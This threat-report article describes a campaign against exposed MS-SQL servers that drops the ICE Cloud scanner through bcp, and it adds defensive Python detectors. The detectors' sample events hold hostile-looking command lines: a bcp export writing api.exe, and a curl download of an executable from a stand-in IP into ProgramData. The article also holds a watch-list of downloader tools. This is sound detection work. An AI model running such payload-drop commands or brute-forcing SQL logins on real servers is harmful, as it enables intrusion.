A persistent threat actor tracked as Larva-26002 is actively targeting poorly secured Microsoft SQL servers to deploy a new scanner malware called ICE Cloud Client. The campaign marks a strategic shift from ransomware deployment to large-scale reconnaissance of vulnerable database infrastructure.
Security analysts observed that the attackers repeatedly compromise the same exposed systems, indicating a long-term strategy focused on building a network of scanning nodes.
Evolution of the Campaign
The activity dates back to early 2024, when the group deployed ransomware on exposed database servers. Initial operations included:
- Trigona ransomware
- Mimic ransomware
- Remote access tools
- RDP port forwarding
Over time, the attackers transitioned from encryption attacks to infrastructure scanning.
Shift to Scanner Malware
In 2026, researchers observed the deployment of ICE Cloud, a scanner written in the Go programming language.
This replaces:
- Rust-based scanner used in 2025
- Earlier ransomware payloads
The new malware focuses on identifying additional vulnerable MS-SQL servers.
Long-Term Targeting Strategy
The group repeatedly attacks:
- Internet-exposed SQL servers
- Weak credential configurations
- Unpatched database systems
Compromised systems are then used to scan other databases, creating a growing reconnaissance network.
Infection Mechanism
The attack begins when exposed MS-SQL servers are identified.
The attacker:
- Performs brute-force login attempts
- Runs system profiling commands
- Deploys malware using SQL utilities
Common reconnaissance commands include:
- hostname
- whoami
- netstat -an
These help attackers understand system privileges and network connectivity.
Abuse of BCP Utility
Attackers abuse the legitimate Bulk Copy Program (bcp) utility that ships with SQL Server to drop malware.
The process:
- The malware binary is stored in a database table
- It is exported to disk with a BCP command
- The export is saved locally as api.exe
- The file is then executed on the host
Because the payload reaches disk through an already-installed, trusted utility rather than a separate download, this technique can bypass some security controls.
Alternative Delivery Methods
If BCP fails, attackers use:
- PowerShell
- Curl
- Bitsadmin
These tools download the payload directly from remote infrastructure.
ICE Cloud Malware Execution
The infection chain includes two stages:
- ICE Cloud Launcher
- ICE Cloud Client
The launcher:
- Connects to command server
- Downloads scanner component
- Executes client under random filename
This helps evade detection.
Scanner Functionality
Once active, ICE Cloud:
- Registers with command server
- Receives target SQL server list
- Attempts credential login
- Reports successful access
Example credentials used include default combinations like:
- ecomm / ecomm
This indicates automated brute-force scanning.
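The brute-force step described in the Infection Mechanism and Scanner Functionality sections leaves a distinctive trace in the SQL Server ERRORLOG: a burst of failed logins from one client address, cycling through usernames, sometimes followed by a success. The following Python is an added detection example written for this article; it is not code from the report or from the malware. It parses constructed ERRORLOG-style lines (the timestamps, addresses and usernames other than the report's "ecomm" are invented), flags sources that exceed a failure threshold inside a sliding window, and raises a separate alert when a flagged source later logs in successfully, which is the point at which the scanner would report access back to its operator.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the shape of SQL Server ERRORLOG logon entries
# (error 18456 failures plus one success). They are illustrative, not lines
# taken from the report. 198.51.100.23 plays the scanning node.
SAMPLE_ERRORLOG = """\
2026-02-10 03:14:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2026-02-10 03:14:01.42 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2026-02-10 03:14:02.07 Logon       Login failed for user 'ecomm'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2026-02-10 03:14:02.55 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.23]
2026-02-10 03:14:03.01 Logon       Login failed for user 'ecomm'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2026-02-10 03:14:03.88 Logon       Login failed for user 'test'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.23]
2026-02-10 09:30:15.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.15]
2026-02-10 11:02:44.00 Logon       Login succeeded for user 'ecomm'. Connection made using SQL Server authentication. [CLIENT: 198.51.100.23]
"""

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*?\[CLIENT: (?P<ip>[^\]]+)\]"
)


def parse_logon_events(text):
    """Return one dict per logon line: ts (datetime), result, user, ip."""
    events = []
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if not m:
            continue  # other ERRORLOG content is ignored
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    return events


def find_bruteforce_sources(events, threshold=5, window=timedelta(seconds=60)):
    """Flag client IPs with >= threshold failed logins inside any sliding window.

    The returned dict maps ip -> total failures, the distinct usernames tried
    and the timestamp at which the burst crossed the threshold."""
    failures = defaultdict(list)
    for ev in events:
        if ev["result"] == "failed":
            failures[ev["ip"]].append(ev)
    flagged = {}
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "failures": len(evs),
                    "users": sorted({e["user"] for e in evs}),
                    "burst_end": evs[end]["ts"],
                }
                break
    return flagged


def find_success_after_burst(events, flagged):
    """A successful login from a flagged source after its burst matches the
    scanner's 'report successful access' step; return (ip, user) pairs."""
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        src = flagged.get(ev["ip"])
        if ev["result"] == "succeeded" and src and ev["ts"] >= src["burst_end"]:
            hits.append((ev["ip"], ev["user"]))
    return hits


if __name__ == "__main__":
    evs = parse_logon_events(SAMPLE_ERRORLOG)
    sources = find_bruteforce_sources(evs)
    for ip, info in sources.items():
        print(f"brute-force source {ip}: {info['failures']} failures, users {info['users']}")
    for ip, user in find_success_after_burst(evs, sources):
        print(f"ALERT: {ip} succeeded as '{user}' after a failed-login burst")
```

Failed logins only reach the ERRORLOG when login auditing is enabled on the instance (failed-only is the default; successes require the "both" setting), so the success-after-burst check assumes that setting. On a real server the same logic can be fed from the Windows Application log, where SQL Server writes the same 18456 messages.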
Indicators of Attribution
Researchers observed:
- Turkish-language strings
- Emoji characters in binary
- Similar infrastructure to earlier campaigns
These clues link the activity to previous Mimic ransomware operations.
Why This Campaign Is Dangerous
The shift to scanning suggests attackers are:
- Mapping vulnerable databases
- Building access inventory
- Preparing future attacks
- Expanding botnet-like infrastructure
This reconnaissance phase could precede ransomware or data theft campaigns.
Indicators of Compromise
Security teams should watch for:
- Unexpected BCP activity
- api.exe in ProgramData directory
- Suspicious outbound connections
- Unusual SQL authentication attempts
- Random executable filenames
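The BCP abuse, the PowerShell/curl/bitsadmin fallback and the indicators listed above all show up as process-creation telemetry on the database host, where the common thread is the SQL Server service process (sqlservr.exe) spawning tools it has no routine reason to run. The following Python is an added example written for this article, not code from the report or any vendor: it runs three rules over constructed Sysmon-style process events (paths, hostnames and the 198.51.100.77 address are invented; api.exe and ProgramData are the report's indicators) and flags sqlservr.exe child processes, any reference to ProgramData\api.exe, and executables with random-looking names launched from the ProgramData root.

```python
import ntpath
import re

# Executables the report names as launched from the SQL Server context:
# bcp.exe for the table-to-file export and the fallback downloaders, plus
# cmd.exe, which SQL-initiated shell commands arrive through.
SUSPECT_CHILDREN = {"bcp.exe", "cmd.exe", "powershell.exe", "curl.exe", "bitsadmin.exe"}
SQL_SERVICE_IMAGE = "sqlservr.exe"
PROGRAMDATA_ROOT = r"c:\programdata"
# The dropped-file name the report gives, in the directory it names.
API_EXE_RE = re.compile(r"programdata\\api\.exe", re.IGNORECASE)

# Constructed process-creation events using Sysmon event-1 field names. The
# install path, file names and 198.51.100.77 are invented for the example.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c bcp "SELECT blob FROM dbo.tmp_bin" queryout C:\ProgramData\api.exe -T -f C:\ProgramData\fmt.txt'},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\ProgramData\gx7k2qpl.exe http://198.51.100.77/PLACEHOLDER"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\ProgramData\gx7k2qpl.exe",
     "CommandLine": r"C:\ProgramData\gx7k2qpl.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe https://example.com/"},
]


def basename(path):
    return ntpath.basename(path).lower()


def in_programdata_root(path):
    # True only for files placed directly in C:\ProgramData, not in a vendor
    # subfolder where legitimate software keeps its data.
    return ntpath.dirname(path).lower() == PROGRAMDATA_ROOT


def looks_random(filename):
    """Heuristic for machine-generated names: an alphanumeric stem of 8 or
    more characters with either three or more digits or no vowels at all."""
    stem = ntpath.splitext(filename)[0].lower()
    if len(stem) < 8 or not stem.isalnum():
        return False
    digits = sum(c.isdigit() for c in stem)
    vowels = sum(c in "aeiou" for c in stem)
    return digits >= 3 or vowels == 0


def scan_process_events(events):
    """Apply the three rules to each event; return alerts in event order."""
    alerts = []
    for idx, ev in enumerate(events):
        parent = basename(ev["ParentImage"])
        image = basename(ev["Image"])
        cmdline = ev.get("CommandLine", "")
        # Rule 1: the SQL Server service spawning a shell, bcp or a downloader.
        if parent == SQL_SERVICE_IMAGE and image in SUSPECT_CHILDREN:
            alerts.append({"event": idx, "rule": "sqlservr_child_process", "image": image})
        # Rule 2: the report's dropped-file indicator, written or executed.
        if API_EXE_RE.search(cmdline) or API_EXE_RE.search(ev["Image"]):
            alerts.append({"event": idx, "rule": "api_exe_in_programdata", "image": image})
        # Rule 3: random-named executable running from the ProgramData root.
        if in_programdata_root(ev["Image"]) and image != "api.exe" and looks_random(image):
            alerts.append({"event": idx, "rule": "random_name_in_programdata", "image": image})
    return alerts


if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(f"event {alert['event']}: {alert['rule']} ({alert['image']})")
```

Rule 1 is the high-confidence one: on a normally operating database server sqlservr.exe should not be a parent of cmd.exe, bcp.exe or any download tool at all, so it can be alerted on without the command-line context. Rule 3 is a heuristic and belongs in a hunting query rather than a paging alert.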
Mitigation Recommendations
Database administrators should:
- Use strong SQL credentials
- Restrict internet exposure
- Implement firewall rules
- Monitor SQL login attempts
- Update endpoint protection
Additional Defensive Steps
Organizations should:
- Disable unnecessary SQL features
- Monitor PowerShell execution
- Audit database access logs
- Block unknown outbound traffic
- Apply regular patching
Key Takeaways
- Larva-26002 is targeting exposed MS-SQL servers
- The ICE Cloud scanner is being deployed on compromised hosts
- The actor has shifted from ransomware to reconnaissance
- The BCP utility is abused for malware delivery
- Immediate database hardening is required
Conclusion
The Larva-26002 campaign highlights a growing trend where attackers pivot from ransomware to stealthy reconnaissance. By compromising poorly secured MS-SQL servers and deploying ICE Cloud scanners, threat actors are building a foundation for future attacks. Organizations must secure database infrastructure and monitor for unusual SQL activity to reduce exposure.